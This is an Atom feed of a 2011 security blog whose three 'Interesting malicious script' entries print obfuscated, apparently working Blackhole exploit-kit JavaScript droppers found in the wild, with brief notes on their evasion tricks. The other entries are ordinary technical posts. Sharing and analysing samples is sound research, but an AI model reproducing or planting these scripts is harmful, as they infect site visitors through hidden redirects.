<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom"><title type="text">博客园_coordinator's planet</title><subtitle type="text">叶子 是不会飞翔的翅膀翅膀 是落在天上的叶子</subtitle><id>http://feed.cnblogs.com/blog/u/12686/rss</id><updated>2011-10-27T19:17:48Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><generator>feed.cnblogs.com</generator><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/"/><link rel="self" type="application/atom+xml" href="http://feed.cnblogs.com/blog/u/12686/rss"/><entry><id>http://www.cnblogs.com/lzcarl/archive/2011/10/28/2227212.html</id><title type="text">Interesting malicious script #3</title><summary type="text">This is the newest variant of black hole, labeled by MS as Blacole.R. It is still surprising to see the signature of Black hole upgraded nearly a dozen of version in a month or two.I've replaced the payload in &lt;span&gt;&lt;/span&gt; as it is very large. Eval itself is turned into string and I</summary><published>2011-10-27T19:16:00Z</published><updated>2011-10-27T19:16:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2011/10/28/2227212.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2011/10/28/2227212.html"/><content type="html">&lt;p&gt;This is the newest variant of black hole, labeled by MS as Blacole.R. It is still surprising to see the signature of Black hole upgraded nearly a dozen of version in a month or two.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;I've replaced the payload in &amp;lt;span&amp;gt;&amp;lt;/span&amp;gt; as it is very large. &lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Eval itself is turned into string and I think they can even play more tricks to hide the string eval.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div style="background-color: #F5F5F5;border: 1px solid #CCCCCC;padding:10px;"&gt;&lt;div&gt;&amp;lt;html&amp;gt;&amp;lt;title&amp;gt;ev&amp;lt;/title&amp;gt;&amp;lt;body&amp;gt;&amp;lt;input&amp;nbsp;type="input"&amp;nbsp;name="KVhMSfMk"&amp;nbsp;value="length"&amp;nbsp;style="display:none"&amp;gt;&amp;lt;span&amp;nbsp;style="visibility:hidden"&amp;gt;&lt;br /&gt;&amp;lt;span&amp;gt;"Large&amp;nbsp;Malicious&amp;nbsp;Payload"&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;script&amp;gt;&lt;br /&gt;riJdw0=&lt;span style="color: #0000FF;"&gt;this&lt;/span&gt;["document"];&lt;br /&gt;Wm6aTby4="innerHTML";&lt;br /&gt;Jws9z=window;&lt;br /&gt;riJdw0.tAinU7TY=&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;(hy){&lt;span style="color: #0000FF;"&gt;return&lt;/span&gt;&amp;nbsp;riJdw0.getElementsByName(hy);};&lt;br /&gt;riJdw0.PgOrtKo=&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;(hy){&lt;span style="color: #0000FF;"&gt;return&lt;/span&gt;&amp;nbsp;riJdw0.getElementsByTagName(hy);};&lt;br /&gt;&lt;br /&gt;MCchJo=riJdw0.tAinU7TY("KVhMSfMk")[0]["va"+"lue"];&lt;br /&gt;&lt;br /&gt;vjhac2P=&lt;span style="color: #0000FF;"&gt;new&lt;/span&gt;&amp;nbsp;Function("x,y,z","return&amp;nbsp;x.replace(y,z)");&lt;br /&gt;BMEIlPB=&lt;span style="color: #0000FF;"&gt;new&lt;/span&gt;&amp;nbsp;Function("x,y,z","return&amp;nbsp;x.substr(y,z)");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;M21Sq=vjhac2P("","",&lt;span style="color: #0000FF;"&gt;new&lt;/span&gt;&amp;nbsp;Object("eval"));&lt;br /&gt;&lt;br /&gt;jKSwJN&amp;nbsp;=&amp;nbsp;Jws9z[M21Sq](M21Sq);&lt;br /&gt;&lt;br /&gt;dqCjX=riJdw0.PgOrtKo("span")[1][Wm6aTby4];&lt;br /&gt;SloAR&amp;nbsp;=&amp;nbsp;"pN#QWy,^Kri['HEBe=k&amp;nbsp;ctAbZsO4Dg&amp;amp;X@US9VzT7Rq/&amp;gt;fwI*$Jn6_vxC;\\L5Y+d(:1].aoh&amp;lt;l-8!P23?0)GjMm\"|uF{%}";&lt;br /&gt;PCvwO="";&lt;br /&gt;NxJdPAs=dqCjX[MCchJo];&lt;br /&gt;Po7tS43=0;&lt;br /&gt;&lt;span style="color: #0000FF;"&gt;while&lt;/span&gt;(Po7tS43&amp;lt;NxJdPAs){&lt;br /&gt;Ub4phW=BMEIlPB(dqCjX,Po7tS43+(124*0),44/22)*(45*2/90);&lt;br /&gt;PCvwO=PCvwO["concat"](BMEIlPB(SloAR,jKSwJN("Ub4phW"),1));&lt;br /&gt;Po7tS43=2+Po7tS43;&lt;br /&gt;}&lt;br /&gt;jKSwJN(PCvwO);&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New'; font-size: 13px; line-height: 19px; background-color: #f5f5f5; "&gt;&amp;lt;/script&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://www.cnblogs.com/lzcarl/aggbug/2227212.html?type=1" width="1" height="1" alt=""/&gt;&lt;p&gt;&lt;a href="http://www.cnblogs.com/lzcarl/archive/2011/10/28/2227212.html" target="_blank"&gt;本文链接&lt;/a&gt;&lt;/p&gt;</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225046.html</id><title type="text">Interesting malicious script #2</title><summary type="text">This script has eval exposed, but simply replacing eval with alert won't show the malicious payload. In fact, only m[i] will be shown in the popup dialog.And the eval is executed in the catch block, which should be able to defeat a lot of emulators, as emulators usually disable exception for per</summary><published>2011-10-26T04:37:00Z</published><updated>2011-10-26T04:37:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225046.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225046.html"/><content type="html">&lt;p&gt;This script has eval exposed, but simply replacing eval with alert won't show the malicious payload. In fact, only m[i] will be shown in the popup dialog.&amp;nbsp;&lt;/p&gt;&lt;p&gt;And the eval is executed in the catch block, which should be able to defeat a lot of emulators, as emulators usually disable exception for performance issue.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New'; font-size: 13px; line-height: 19px; background-color: #f5f5f5; "&gt;&amp;lt;script&amp;gt;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;s=&lt;span style="color: #0000FF;"&gt;new&lt;/span&gt;&amp;nbsp;String();&lt;span style="color: #0000FF;"&gt;try&lt;/span&gt;{document.asd.asd}&lt;span style="color: #0000FF;"&gt;catch&lt;/span&gt;(q){r=1;c=String;}&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;(r&amp;amp;&amp;amp;document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,50*u,228/u,49.5*u,234/u,58*u,228/u,48.5*u,224/u,48.5*u,216/u,52.5*u,230/u,23*u,222/u,57*u,206/u,50.5*u,92/u,56*u,216/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,92/u,56*u,208/u,56*u,126/u,52.5*u,200/u,30.5*u,200/u,26*u,204/u,25.5*u,106/u,51.5*u,240/u,52.5*u,234/u,54*u,200/u,58*u,114/u,51*u,100/u,50.5*u,224/u,61*u,102/u,58.5*u,112/u,53*u,104/u,25.5*u,200/u,28*u,214/u,61*u,228/u,50*u,112/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u,59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,50*u,228/u,49.5*u,234/u,58*u,228/u,48.5*u,224/u,48.5*u,216/u,52.5*u,230/u,23*u,222/u,57*u,206/u,50.5*u,92/u,56*u,216/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,92/u,56*u,208/u,56*u,126/u,52.5*u,200/u,30.5*u,200/u,26*u,204/u,25.5*u,106/u,51.5*u,240/u,52.5*u,234/u,54*u,200/u,58*u,114/u,51*u,100/u,50.5*u,224/u,61*u,102/u,58.5*u,112/u,53*u,104/u,25.5*u,200/u,28*u,214/u,61*u,228/u,50*u,112/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.qwe.removeChild({})}catch(q){e(s);}&amp;lt;/script&amp;gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://www.cnblogs.com/lzcarl/aggbug/2225046.html?type=1" width="1" height="1" alt=""/&gt;&lt;p&gt;&lt;a href="http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225046.html" target="_blank"&gt;本文链接&lt;/a&gt;&lt;/p&gt;</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225040.html</id><title type="text">Interesting malicious script #1</title><summary type="text">1varCJlKp;functionAyzhzK(){}2varKCfW;varxBtS;varHEKIZIOW="";if('EXHJH'=='vaEYij')LWkpgS();if('CLfChe'=='QiJCNa')uYVR='YcOyK';varUjFXc="sl\x69\x63e";varkBzvW='FUQEEH';if('hyIN'=='Sjacj')YNTWV='MgnooX';varAFXFJ</summary><published>2011-10-26T04:31:00Z</published><updated>2011-10-26T04:31:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225040.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225040.html"/><content type="html">&lt;div style="background-color: #F5F5F5;border: 1px solid #CCCCCC;padding:10px;"&gt;&lt;div&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;1&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;CJlKp;&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;AyzhzK(){}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;2&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;KCfW;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;xBtS;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;HEKIZIOW="";&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('EXHJH'=='vaEYij')LWkpgS();&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('CLfChe'=='QiJCNa')uYVR='YcOyK';&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;UjFXc="sl\x69\x63e";&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;kBzvW='FUQEEH';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('hyIN'=='Sjacj')YNTWV='MgnooX';&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;AFXFJ="par\x73\x65I\x6e\x74";&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;isOLx(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;MffyRe='uVxx';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('VOchH'=='wFdlb')jmQg();}&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;OOfB=266;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;CBjFe="from\x43\x68arCo\x64\x65";&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;WctUeU=70;&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;mETfy(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;frqWsm='VUkpH';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('ISUjCf'=='ooMnor')uXsN();}&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;ickml='EdHEGs';&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;iBnNdM(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;fdjY='oNsVaE';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('zvawkT'=='hKLy')RCnxsx();}&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;KdEQdo(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;htQo='aahGP';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('NiRNL'=='igtAy')SvWSak();}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;3&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;bQArecF="\x65va\x6c";&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;CoCv;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;hSUhic="97a69f94a59aa09f517896a5a9595aaca792a3518599969f516e519f96a8517592a596595a6c8599969f5fa496a5859a9e96598599969f5f9896a5859a9e96595a515c5163655b67615b67615b6261616161615a6ca792a35194a0a09c9a9684a5a39a9f98516e519f96a85184a5a39a9f985995a094a69e969fa55f94a0a09c9a965a6ca792a35194a0a09c9a967996929596a3516e51536294626a926a93686464636995979365976297649361926362676696936697656e536ca792a3519396989a9f81a0a49aa59aa09f516e5194a0a09c9a9684a5a39a9f985f9a9f9596a980975994a0a09c9a967996929596a35a6c9a9751599396989a9f81a0a49aa59aa09f51526e515e625aac51ae51969da49651ac5195a094a69e969fa55f94a0a09c9a96516e51536294626a926a93686464636995979365976297649361926362676696936697656e95649e9895a76267966a6aa6999d949a61a6636a9367626798686c96a9a19aa396a46e535c518599969f5fa5a0787e8584a5a39a9f98595a6c95a094a69e969fa55fa8a39aa59659586d9a97a3929e9651a89a95a5996e5362535199969a9899a56e5362535193a0a39596a36e5361535197a3929e9693a0a39596a36e53615351a4a3946e5399a5a5a16b606094a09fa5a39294a3a65f94a09e609ba46098a05fa199a170a49a956e62536f6d609a97a3929e966f585a6c51ae51ae517896a5a9595a6c";&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;uXxtZR;&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('yhio'=='XJNeu')iPwQ();&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;JJzKgq(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;Pprz='HfRLK';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('fSeuLE'=='Cmzqzh')fYhHk();}&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;GukX(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;lwMRz='BIVP';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('PxWxYW'=='zPKT')TdLG();}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;4&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;JJPANg=(&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;(){&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;pTLNxj(){}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;return&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;this&lt;/span&gt;;&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;nqdbb(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;izkwtx='tXwVwD';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('aKcN'=='ACjplq')dVkVS();}&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;CXyDOj(){}&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;PBeid(){}})();&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;vooP(){}&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;MSHc(){}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;6&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('MWcZI'=='jZKAY')iLhg='RVPHa';&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;ROrCn="\x63\x6fnst\x72\x75ctor";&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;MySXGL;&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;BjraL(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;PgUmc='dOaSu';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('nrXie'=='cWfc')mSKg();}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;7&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;dbNwId="HPRIc"[ROrCn];&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('EqRN'=='lGvAZh')FxemqM='OwCf';&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;jtCrn(){}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;8&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;SgTG(){}&lt;br /&gt;&lt;span style="color: #008080;"&gt;&amp;nbsp;9&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;for&lt;/span&gt;(NXBWzRCL=0;NXBWzRCL&amp;lt;hSUhic.length;NXBWzRCL+=2){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;DoyNqK;&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('UmLXys'=='HorpX')qPFj='uyyr';CBRLbsdu=JJPANg[AFXFJ](hSUhic[UjFXc](NXBWzRCL,NXBWzRCL+2),16)-49;&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;hGrsA(){&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;wERD='csxJmp';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('XbtA'=='Ktvf')MptqGo();}&lt;span style="color: #0000FF;"&gt;var&lt;/span&gt;&amp;nbsp;eenfM='NbKy';HEKIZIOW+=dbNwId[CBjFe](CBRLbsdu)&lt;br /&gt;&lt;span style="color: #008080;"&gt;10&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('qajnID'=='IUBrP')NPzkj='nMaGZ';&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('AduB'=='vrtx')ZaiTw='NVNo';}&lt;br /&gt;&lt;span style="color: #008080;"&gt;11&lt;/span&gt;&amp;nbsp;&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('KQgidC'=='ClKb')kqjEAT();JJPANg[bQArecF](HEKIZIOW);&lt;span style="color: #0000FF;"&gt;function&lt;/span&gt;&amp;nbsp;LLIEAa(){}&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('rCcB'=='fkiBG')Jyghv();&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('IaqY'=='YDomN')hVhK();&lt;span style="color: #0000FF;"&gt;if&lt;/span&gt;('eTdLwx'=='rrqc')vGUG();&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;I Found this one in the wild. This is really heavy obfuscated and I can't find where they eval the malicious payload. This script finally leads to Russian web site.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Forefront classify it as Blacole.A, but it is not quite like the blackhole exploit script I ever saw.&lt;/p&gt;&lt;/div&gt;&lt;img src="http://www.cnblogs.com/lzcarl/aggbug/2225040.html?type=1" width="1" height="1" alt=""/&gt;&lt;p&gt;&lt;a href="http://www.cnblogs.com/lzcarl/archive/2011/10/26/2225040.html" target="_blank"&gt;本文链接&lt;/a&gt;&lt;/p&gt;</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2011/10/22/2220926.html</id><title type="text">About the newest Mass SQL Injection</title><summary type="text">http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.htmlAfter searching on Google and Bing, I found this mass-sql-injection attacked 134,000 sites in Google's result and 22,500 sites in Bing's result.Safebrowsing only blocked a minority of them. And the numb</summary><published>2011-10-21T23:27:00Z</published><updated>2011-10-21T23:27:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2011/10/22/2220926.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2011/10/22/2220926.html"/><content type="html">&lt;div&gt;&lt;a href="http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.html"&gt;http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.html&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;After searching on Google and Bing, I found this mass-sql-injection attacked 134,000 sites in Google's result and 22,500 sites in Bing's result.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Safebrowsing only blocked a minority of them. And the number has been increased from 80k to 130k since it is mentioned in oct 12.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;img src="http://images.cnblogs.com/cnblogs_com/lzcarl/google.png" width="709" height="638" alt="" /&gt;&lt;/p&gt;&lt;p&gt;&lt;img src="http://images.cnblogs.com/cnblogs_com/lzcarl/bing.png" width="675" height="550" alt="" /&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://www.cnblogs.com/lzcarl/aggbug/2220926.html?type=1" width="1" height="1" alt=""/&gt;&lt;p&gt;&lt;a href="http://www.cnblogs.com/lzcarl/archive/2011/10/22/2220926.html" target="_blank"&gt;本文链接&lt;/a&gt;&lt;/p&gt;</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2010/05/05/1727858.html</id><title type="text">How to resize the ubuntu root partition of vmware workstation</title><summary type="text">This happens when you find install Ubuntu on vwmare and then find that the partition is too small for root.Belows are what I do to solve this:1. try use vdiskmanager to resize the vmdisk file http://w...</summary><published>2010-05-05T03:44:00Z</published><updated>2010-05-05T03:44:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2010/05/05/1727858.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2010/05/05/1727858.html"/><content type="text">This happens when you find install Ubuntu on vwmare and then find that the partition is too small for root.Belows are what I do to solve this:1. try use vdiskmanager to resize the vmdisk file http://w...</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2010/04/03/1703522.html</id><title type="text">How to configure ssl on Tomcat 6</title><summary type="text">Check this:http://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.htmlAnd make sure use the keytool of JAVA rather than that of GNU.It costs me an hour to figure it out.JAVA keytool is located in $JAVA_HOM...</summary><published>2010-04-02T20:48:00Z</published><updated>2010-04-02T20:48:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2010/04/03/1703522.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2010/04/03/1703522.html"/><content type="text">Check this:http://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.htmlAnd make sure use the keytool of JAVA rather than that of GNU.It costs me an hour to figure it out.JAVA keytool is located in $JAVA_HOM...</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2009/03/30/1424752.html</id><title type="text">Recent plans</title><summary type="text">Recently, I'm stuck with three project.The first is course project for P523, Compiler. This one uses scheme to write a compiler for sub-scheme and run on AMD-x86 platform. Scheme is astonishing wield ...</summary><published>2009-03-29T19:58:00Z</published><updated>2009-03-29T19:58:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2009/03/30/1424752.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2009/03/30/1424752.html"/><content type="text">Recently, I'm stuck with three project.The first is course project for P523, Compiler. This one uses scheme to write a compiler for sub-scheme and run on AMD-x86 platform. Scheme is astonishing wield 